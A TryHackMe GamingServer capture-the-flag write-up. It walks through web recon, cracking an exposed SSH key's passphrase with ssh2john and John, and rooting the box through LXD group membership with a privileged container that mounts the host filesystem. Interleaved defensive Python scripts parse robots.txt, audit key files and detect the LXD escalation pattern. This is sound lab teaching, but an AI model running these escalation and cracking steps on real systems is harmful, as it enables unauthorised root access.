GamingServer WriteUp | TryHackMe

Onurcan Genç
7 min read · Feb 26, 2024


Hi everyone, today I will analyse the machine called GamingServer. Before I start port scanning, I will check manually whether a web app exists.

1) Using direct access through URL & curl

As you can see here, we have a web app.
  • I will send the request with curl using the -v (verbose) parameter, since I want detailed information.
The most interesting part of the curl output:
  • After a deeper analysis, I recognized that there was a comment in the HTML, and it seems to name a user of the system.

1.2) Manual approach:

You can also use the browser to get the same results.

2) Understanding the technology behind the system

  • To understand the technologies the system is using, we will use another tool called whatweb, a web scanner that reports the technologies running behind the web app.
You can give it the URL directly, whether it is an IP address or a hostname.
  • As you can see below, it shows the same data, but filtered down to what we need. Even though curl can lead us to the same conclusions about the web app, whatweb gives us the most necessary information for our pentest operations.
  • whatweb is mostly useful before we start real network scans because it does not generate nmap's network noise. Furthermore, we can get the web server's type, OS info and so on.

3) Port Scanning

  • I often use this command, especially in CTFs. Because of my department's network bandwidth, I am going to use just a version scan instead of applying an all-ports & script scan.

nmap -sV -sC -p- Ip-Address

NMAP SCAN RESULT:

  • Meanwhile, you can also run a directory brute-force scan using gobuster, dirbuster or wfuzz.
  • You can use the following command to begin directory discovery.
Thanks to my department, I can search fast xD

GoBuster Scan Result:

  • The same issue occurred. Thanks to my department's network bandwidth, I was not able to scan properly. However, we still have juicy information.
I will check the status codes 200 and 301.

/robots.txt

As you can see here, according to robots.txt we are allowed to search /uploads/.

/uploads

  • Yes! We have more juicy information.
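From the defender's side, the lesson of the robots.txt step is that the file is a hint to crawlers, not an access control: every path it names, whether under Allow or Disallow, is disclosed to anyone who reads it. The parser below is an added example (not code from the writeup); the robots.txt body it parses is constructed to resemble the one found on the box, so that a site owner can list every advertised path and confirm each one has real authorization behind it.

```python
# Added example (not from the original writeup): parse a robots.txt body and
# list every path it advertises. robots.txt is a hint to crawlers, not an
# access control, so each listed path needs its own authorization check.

SAMPLE_ROBOTS = """\
# constructed sample, modelled on the style of the file seen on the box
User-agent: *
Allow: /uploads/
Disallow: /secret/
Disallow: /admin
Disallow:
"""


def parse_robots(text):
    """Return a list of (user_agent, directive, path) tuples.

    Handles comments, blank lines, grouped User-agent records and the
    empty 'Disallow:' line (which means 'no restriction' and names no path).
    """
    rules = []
    agents = []        # User-agent lines of the record being read
    in_rules = False   # have we seen an Allow/Disallow for this record yet?
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if not line or ":" not in line:
            continue
        field, value = (part.strip() for part in line.split(":", 1))
        field = field.lower()
        if field == "user-agent":
            if in_rules:                          # a new record starts here
                agents, in_rules = [], False
            agents.append(value)
        elif field in ("allow", "disallow"):
            in_rules = True
            if value:                             # empty Disallow names no path
                for agent in agents or ["*"]:
                    rules.append((agent, field, value))
    return rules


def advertised_paths(text):
    """Every path named in the file, whatever the directive: a reader,
    human or bot, learns about all of them."""
    return sorted({path for _, _, path in parse_robots(text)})


if __name__ == "__main__":
    for agent, directive, path in parse_robots(SAMPLE_ROBOTS):
        print(f"{agent:4} {directive:8} {path}")
    print("paths to verify access control on:", advertised_paths(SAMPLE_ROBOTS))
```

Run against a real site's robots.txt, the output of advertised_paths is the checklist: each entry should return the same response to an anonymous client as it would to a crawler that respected the file, which is to say a 401/403 where the content is meant to be private.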

3.1) Gathering all juicy data !

  • There is a dictionary list, maybe for usernames or passwords, or both.
  • I am not interested in reading all the text. Instead, let's check what remains in the directory brute-force result.
  • I found that there is also another path that redirects us to the /secret path.
Status 301 means a permanent redirection to another path in the web app. In short, a new location has been assigned to this path, and new visitors will be redirected there.

/secret

Most probably we will encounter an SSH key pair :) (90% a private key)
  • Gotcha! I saw that there is an authentication mechanism in the secretKey.
SSH private key

4) Pre-Exploitation

  • Let's check what we have so far.

1- SSH private key

2- Dictionary list

3- Comment in the HTML which includes the user john

  • We have the opportunity to use john as the username and brute-force our SSH key with the dictionary list in order to crack the private key passphrase.

1- Apply ssh2john.py

  • To convert our private key into John's brute-force format, we are going to start ssh2john.py.
ssh2john
  • I just tried to see what we get in order to use that Python script.
It says that we just have to add the related path and execute the command.
  • Let's download the required files.
wget is another useful method for automation or the downloading process.
The > operator redirects all the output into id_rsa.txt.
I wanted to add this as a proof of concept.
  • Let's brute-force through John.

Normally, yesterday I was able to crack the password using a wordlist. However, today I will switch to another device to crack the required file. Moreover, you can also use crackstation or other sites that store the same hash databases.

  • As you can see here, letmein is our passphrase to authenticate our SSH session.
The SSH client warns us to set the necessary file permissions on our private key. It says the key is 0644, which is the default permission for any plain text file, and that this is too open.
  • Let me change the permissions using the following command.
chmod 600 secretKey
  • Yes, it works. After this, SSH allows us to connect using the -i parameter.
ssh -i secretKey john@10.10.166.23
We are the john user at that point.
  • Let's check what we can do as john :)
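The two things that made this key usable are what a key-hygiene check should catch: a private key sitting in a world-readable location (the 0644 mode that ssh itself complains about) and a passphrase weak enough to be in a wordlist. The script below is an added example, not part of the writeup. It reproduces the mode check the ssh client performs and reads the cipher field of an OpenSSH-format key to tell whether it is passphrase-protected at all ("none" means no passphrase). The two sample keys it audits are constructed, header-only blobs: enough to exercise the format check, not usable keys.

```python
# Added example (not from the writeup): audit an SSH private key file the way
# the ssh client does before it refuses a key. Two checks: file mode (ssh
# rejects a key readable by group/other, e.g. 0644) and whether the key is
# passphrase-protected. Sample keys are constructed, header-only OpenSSH
# blobs, sufficient for the format check but not real keys.
import base64
import os
import stat
import struct
import tempfile

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def key_file_too_open(path):
    """True if any group/other permission bit is set, which is exactly what
    ssh's 'UNPROTECTED PRIVATE KEY FILE!' warning checks."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    return bool(mode & 0o077)


def openssh_key_cipher(pem_text):
    """Return the cipher name stored in an OpenSSH-format private key.
    The blob starts with the magic, then a length-prefixed cipher name;
    'none' means the key carries no passphrase."""
    lines = [ln.strip() for ln in pem_text.strip().splitlines()]
    if lines[0] != "-----BEGIN OPENSSH PRIVATE KEY-----":
        raise ValueError("not an OpenSSH-format private key")
    blob = base64.b64decode("".join(lines[1:-1]))
    if not blob.startswith(OPENSSH_MAGIC):
        raise ValueError("bad OpenSSH key magic")
    off = len(OPENSSH_MAGIC)
    (length,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + length].decode("ascii")


def audit_key(path):
    """Combine both checks into one finding for a key file on disk."""
    with open(path) as fh:
        cipher = openssh_key_cipher(fh.read())
    return {"too_open": key_file_too_open(path),
            "cipher": cipher,
            "encrypted": cipher != "none"}


def make_sample_key(cipher):
    """Constructed key text: magic + cipher-name field only (truncated blob)."""
    blob = OPENSSH_MAGIC + struct.pack(">I", len(cipher)) + cipher.encode("ascii")
    b64 = base64.b64encode(blob).decode("ascii")
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n" + b64 +
            "\n-----END OPENSSH PRIVATE KEY-----\n")


def demo():
    """Write two sample keys with different modes and audit both."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        samples = (("leaked_key", "none", 0o644),        # the bad case
                   ("good_key", "aes256-ctr", 0o600))    # the expected case
        for name, cipher, mode in samples:
            path = os.path.join(tmp, name)
            with open(path, "w") as fh:
                fh.write(make_sample_key(cipher))
            os.chmod(path, mode)
            results[name] = audit_key(path)
    return results


if __name__ == "__main__":
    for name, finding in demo().items():
        print(name, finding)
```

Pointed at a real key directory, audit_key gives a quick triage: "too_open" is the condition that lets another local user copy the file, and "encrypted" being False means there is no passphrase to crack at all, which is worse than the weak one in this box.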

5) Post-Exploitation

  • We have automated (LinPEAS) & manual scan (just look through many directories) options.
  • I do not like the automated approach at first; instead, check what we can run, who our user is, which groups we belong to, and which other users exist on the OS.
  • The most interesting part I see here is LXD, which is the container system on Linux-like operating systems.
  • LXD allows us to run containers on the Linux OS; it is a container service on that operating system.

After a bit of searching, I found a repo on GitHub that mostly talks about the container vulnerability:

This resource is also useful ->

  • We have to deploy the Alpine Linux distro on our target & configure the container as below:
security.privileged=true

5.1) Downloading & uploading our Alpine image

  • I will add step by step all the commands that you need to apply:
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
  • After that, the Alpine distro will be built and packaged as a .tar.gz
It has already been generated.
  • We have to send it to the target machine to deploy and configure our brand-new container image.

Let's open a Python web server in order to upload our Alpine image to our target server.

python3 -m http.server [the port that you would like]

Note: do not include the [ ] when you execute the command.

  • As you can see below, I manually access my local machine through the browser like a web server. I used this method since I do not want to deal with the correct path while uploading the Alpine image.
I have already created the related files for escalation, which are incus.tar.xz and rootfs.squashfs.

Note: Do not start with the https:// protocol since we do not wish to connect under SSL/TLS. That's why we start our URL with http://

I will apply these commands on our target.

(https://github.com/carlospolop/hacktricks/blob/master/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md)

The author of LinPEAS has an LXD-related section in the same repo.

sudo su
#Install requirements
sudo apt update
sudo apt install -y git golang-go debootstrap rsync gpg squashfs-tools
#Clone repo
git clone https://github.com/lxc/distrobuilder
#Make distrobuilder
cd distrobuilder
make
#Prepare the creation of alpine
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
#Create the container
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.18

This code segment prepares the Linux image for us automatically.

  • I want to download the required files onto my target machine.
Using wget it is much easier to fetch files directly from our local machine.
Same approach for rootfs.squashfs.

rootfs.squashfs

rootfs: The root filesystem (rootfs) is the foundation of a container's file system.

squashfs: SquashFS is a compressed, read-only file system format commonly used for container images.

Below, we will import our container image on the target machine and set the privileged option to true so that we will run as the root user.

lxc image import lxd.tar.xz rootfs.squashfs --alias alpine

# Check the image is there
lxc image list

# Create the container
lxc init alpine privesc -c security.privileged=true

# List containers
lxc list

lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

This mounts the host's root filesystem (/) into the container at /mnt/root, so the container sees the host's files.

6) Privilege Escalation

To be able to escalate our user to root, we have to start our Alpine container on the target.

lxc start privesc
lxc exec privesc /bin/sh
# cd /mnt/root #Here is where the filesystem is mounted

That is, you start a /bin/sh shell inside the container and move into the host's base file system.

  • The first command applies only the privilege rule that was set, security.privileged=true.
  • The other one starts a terminal (shell) process inside the container:
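What a defender can take from this chain is that it leaves a very recognisable trail: a non-root user in the lxd group, a container created with security.privileged=true, and the host's / attached to that container as a disk device. The script below is an added example (not from the writeup or from the repos it links) that runs detection logic for exactly those three signals over constructed sample input: a shell-history excerpt built from the commands shown on this page and a small /etc/group fragment. Pattern names and the sample data are my own.

```python
# Added example (not from the writeup): detection logic for the LXD escalation
# pattern shown above, run over constructed shell-history and /etc/group
# samples. Three signals: a user in the 'lxd' group, a container created or
# reconfigured with security.privileged=true, and the host's / mounted into a
# container as a disk device.
import re

LXD_PRIVESC_PATTERNS = [
    ("privileged-container",
     re.compile(r"\blxc\s+(?:init|launch)\b.*security\.privileged=true")),
    ("privileged-config",
     re.compile(r"\blxc\s+config\s+set\b.*security\.privileged\s+true")),
    ("host-root-mount",          # source=/ exactly, not a sub-directory
     re.compile(r"\blxc\s+config\s+device\s+add\b.*\bdisk\b.*\bsource=/(?:\s|$)")),
    ("local-image-import",
     re.compile(r"\blxc\s+image\s+import\b")),
]

# Constructed sample: a history excerpt assembled from the commands on this page.
SAMPLE_HISTORY = """\
ls -la /home/john
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxc image list
lxc init alpine privesc -c security.privileged=true
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/sh
"""

# Constructed sample /etc/group fragment (gid values are made up).
SAMPLE_GROUP_FILE = """\
root:x:0:
sudo:x:27:
lxd:x:108:john
john:x:1000:
"""


def scan_command_lines(lines):
    """Return (line_no, category, command) for every line matching a pattern."""
    hits = []
    for n, line in enumerate(lines, 1):
        for category, rx in LXD_PRIVESC_PATTERNS:
            if rx.search(line):
                hits.append((n, category, line.strip()))
    return hits


def lxd_group_members(group_text):
    """Users who may talk to the LXD socket; membership is root-equivalent."""
    for line in group_text.splitlines():
        name, _, _, members = line.split(":", 3)
        if name == "lxd":
            return [m for m in members.split(",") if m]
    return []


def assess(history_text, group_text):
    """Combine the signals; escalation_chain is True only when a privileged
    container and a host-root mount both appear."""
    hits = scan_command_lines(history_text.splitlines())
    cats = {c for _, c, _ in hits}
    chain = ({"privileged-container", "host-root-mount"} <= cats
             or {"privileged-config", "host-root-mount"} <= cats)
    return {"lxd_members": lxd_group_members(group_text),
            "hits": hits,
            "escalation_chain": chain}


if __name__ == "__main__":
    report = assess(SAMPLE_HISTORY, SAMPLE_GROUP_FILE)
    print("lxd group members:", report["lxd_members"])
    for n, category, cmd in report["hits"]:
        print(f"line {n}: {category}: {cmd}")
    print("full escalation chain present:", report["escalation_chain"])
```

The same regexes apply unchanged to auditd EXECVE records or a shell-history collector; the fix on the host side is the one the group check points at, since removing non-admin users from lxd (or, on recent LXD, using lxd-admin only for administrators) takes away the precondition for the whole chain.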

7) Final Output & Flag Location

As you can see, we got the privileged user.
  • First approach
You can move around the machine command by command.
  • Second approach
You can use a pipe operation in other CTFs. However, my machine cannot execute the second command.

“Thank you for reading and reviewing my page”


Written by Onurcan Genç

Offensive Security Specialist | Tech Enthusiast Welcome to my playground !
